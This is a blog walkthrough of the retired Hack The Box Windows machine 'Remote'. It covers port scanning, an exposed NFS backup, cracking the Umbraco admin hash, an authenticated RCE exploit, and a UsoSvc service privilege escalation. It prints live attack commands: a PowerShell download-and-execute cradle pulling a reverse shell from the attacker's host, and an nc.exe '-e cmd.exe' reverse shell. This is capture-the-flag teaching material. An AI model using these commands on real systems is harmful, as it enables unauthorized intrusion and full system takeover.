Security Blog, Rants, Raves, Write-ups, and Code
Security Blog, Rants, Raves, Write-ups, and Code
Remote
| Name: | Remote 
|
|---|---|
| Release Date: | 21 Mar 2020 |
| Retire Date: | 05 Sep 2020 |
| OS: | Windows |
| Base Points: | Easy - Retired [0] |
| Rated Difficulty: |  |
| Radar Graph: |  |
 |
enjloezz  00 days, 00 hours, 57 mins, 49 seconds |
 |
qtc  00 days, 01 hours, 04 mins, 46 seconds |
| Creator: | mrb3n  |
| CherryTree File: | CherryTree - Remove the .txt extension |
Again, we start with nmap -sC -sV -Pn -p- -oA ./Remote 10.10.10.180
$ nmap -sC -sV -Pn -p- -oA ./Remote 10.10.10.180
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-05 13:24 EDT
Nmap scan report for 10.10.10.180
Host is up (0.058s latency).
Not shown: 65519 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 2m48s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-09-05T17:31:32
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 274.31 seconds
We've got FTP, HTTP, SMB, and a few others. It looks like FTP allows anonymous login, but I'll save you some time and tell you that there's no files there we can play with. My guess this early into the box is that we'll be having to PUT something there instead of GETting something. So, let's check out the HTTP service, which is a Looney Toons "Acme Products" page. Fire up gobuster and see what's behind the scenes.
$ gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.180
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.180
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/09/05 13:30:06 Starting gobuster
===============================================================
/1111 (Status: 200)
/Home (Status: 200)
/Blog (Status: 200)
/Products (Status: 200)
/People (Status: 200)
/blog (Status: 200)
/contact (Status: 200)
/home (Status: 200)
/install (Status: 302)
/intranet (Status: 200)
/people (Status: 200)
/person (Status: 200)
/products (Status: 200)
/umbraco (Status: 200)
===============================================================
2020/09/05 13:36:11 Finished
===============================================================
OK, Gobuster is throwing a LOT of header errors and timeouts, but if you yank those out (although the full list is in the CTB file, you'll notice an umbraco folder, meaning this is using Umbraco as a CMS. Unfortunately for us, all the traditional default credential combos fail, so this looks like it might be another dead end/rabbit hole, or we're missing a crucial piece of information to log in. So, let's see if SMB/NFS shares give us anything useful, cause I've come up empty so far.
SMB is a bust without some credentials, but:
sudo showmount -e 10.10.10.180
gives us a /site_backups (everyone) listing. FINALLY, we're getting somewhere. Let's mount that. And Yes, I know I oops'd the backups vs backup, but hey, nobody's perfect XD
Digging through all that backup data, and a little bit of Google Fu, we discover that the admin credentials are stored in the Umbraco.sdf file. That file is locate in site_backup/App_Data/Umbraco.sdf. Don't bother cat'ting it. Try running strings on it instead. Strings is readable, but there are WAY too many to dig through. So, how do we filter it down? grep is always your friend.
strings Umbraco.sdf | grep admin
$ strings Umbraco.sdf | grep admin
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
User "admin" 192.168.195.1User "admin" umbraco/user/password/changepassword change
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "smith" umbraco/user/saveupdating SessionTimeout, SecurityStamp, CreateDate, UpdateDate, Id, HasIdentity
User "admin" 192.168.195.1User "smith" umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" 192.168.195.1User "smith" umbraco/user/saveupdating Key, IsApproved, Groups, UpdateDate; groups assigned: writer
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "smith" umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" 192.168.195.1User "smith" umbraco/user/password/changepassword change
User "admin" 192.168.195.1User "smith" umbraco/user/saveupdating Key, Groups, UpdateDate; groups assigned: writer
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "ssmith" umbraco/user/saveupdating Name, Key, Groups, UpdateDate; groups assigned: writer
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "ssmith" umbraco/user/saveupdating Username, Email, Key, Groups, UpdateDate; groups assigned: writer
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "ssmith" umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" 192.168.195.1User "ssmith" umbraco/user/password/changepassword change
User "admin" 192.168.195.1User "ssmith" umbraco/user/saveupdating Key, Groups, UpdateDate; groups assigned: writer
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/logoutlogout success
User "admin" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "admin" umbraco/user/saveupdating FailedPasswordAttempts, UpdateDate
User "admin" 192.168.195.1umbraco/user/sign-in/failedlogin failed
User "admin" 192.168.195.1User "admin" umbraco/user/saveupdating FailedPasswordAttempts, UpdateDate
User "admin" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "admin" umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" 192.168.195.1User "admin" umbraco/user/password/changepassword change
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "admin" umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" 192.168.195.1User "admin" umbraco/user/password/changepassword change
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
adminAdministratorsCADMOSKTPIURZ:5F7
User "admin" 192.168.195.1User "admin" umbraco/user/saveupdating TourData, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "admin" umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
And as much as I despise Christmas music, I'm singing Do You See What I See.
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
I need the first hash side of that: b8be16afba8c314ad33d812f22a04991b90e2aaa and then we can bust it open with ole John.
So, vi, nano, echo or however that hash into a file that you can then input into john. I use vi. Then:
john hash --format=RAW-SHA1 --wordlist=/usr/share/wordlists/rockyou.txt
and you get baconandcheese as the password. ummmmmm bacon...... Ok I'm back.
kali@kali:~/Desktop/remote$ vi hash
kali@kali:~/Desktop/remote$ sudo john hash --format=RAW-SHA1 --wordlist=/usr/share/wordlists/rockyou.txt
[sudo] password for kali:
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
baconandcheese (?)
1g 0:00:00:00 DONE (2020-09-05 13:59) 1.449g/s 14237Kp/s 14237Kc/s 14237KC/s baconandchipies1..bacon918
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed
kali@kali:~/Desktop/remote$
Jump back to that Umbraco page and user admin@htb.local:baconandcheese as the credentials and you have yourself a foothold in the CMS. I will fully admit that I know jack squat about Umbraco. So, where do you go when you need help? The HELP menu! <These Dad jokes just keep getting worse. I should stop, but I'm irresistably drawn to being a smartass>
Anyway. The Help menu shows us that the version running is 7.12.4 and searchsploit shows that 7.12.4 is vulnerable to an Authenticated RCE exploit.
I tried several times to get that exploit to work and finally ended up using the one at:
wget https://raw.githubusercontent.com/noraj/Umbraco-RCE/master/exploit.py
Create or use a prebuilt Powershell Reverse Shell one-liner. I named mine powerreverse.ps1. Eventually, I fired up nc -lvnp 4444
And then ran the exploit from noraj:
sudo python3 exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.13/powerreverse.ps1')"
Finally, a shell. It's a crap one, but it's there. Now, let's look around. The iis apppool has an interesting ability to impersonate clients. Let's check into that.
Now we get complicated. There looks to be multiple ways to privesc. I'm going to start with UsoSvc because I remember seeing it on PayloadAllTheThings.
So, here's the progression of the privesc. Copy the nc.exe into your working folder. It is located in /usr/share/windows-resources/binaries/nc.exe.
- invoke-webrequest -Uri http://10.10.14.13/nc.exe -OutFile nc.exe
- sc.exe stop usosvc
- sc.exe config UsoSvc binpath="C:\Users\Public\nc.exe 10.10.14.13 4445 -e cmd.exe"
- <Attacking machine> nc -lvnp 4445
- sc.exe start usosvc
Instantly, you will have an NT Authority/SYSTEM Shell! Move fast though, it doesn't last long. Grab your flags and you're finished.
©2020 Phoenix Computing Solutions | Powered by Coffee, Sarcasm, and Insanity
Everything included in the site is the intellectual property of Chris Ruggieri (Neocount Phoenix) and Phoenix Computing Solutions.
This information should not be construed as legal advice. The owner can not be held liable for anything another entity does with this information.
This information is solely the opinions and experiences of myself (Chris Ruggieri) and should not be construed as endorsement of any product, service, or of illegal activity
(GET WRITTEN PERMISSION PEOPLE!!)
Any links I provide as a convenience and for informational purposes only; they do not constitute an endorsement or an approval by the owner of this site for any of the products, services or opinions of the corporation or organization or individual.
Contact the external sites for answers to questions regarding its content.
This Includes any links posted by Chris Ruggieri in any other websites, Social Media networks, Online Groups and Online sharing Websites.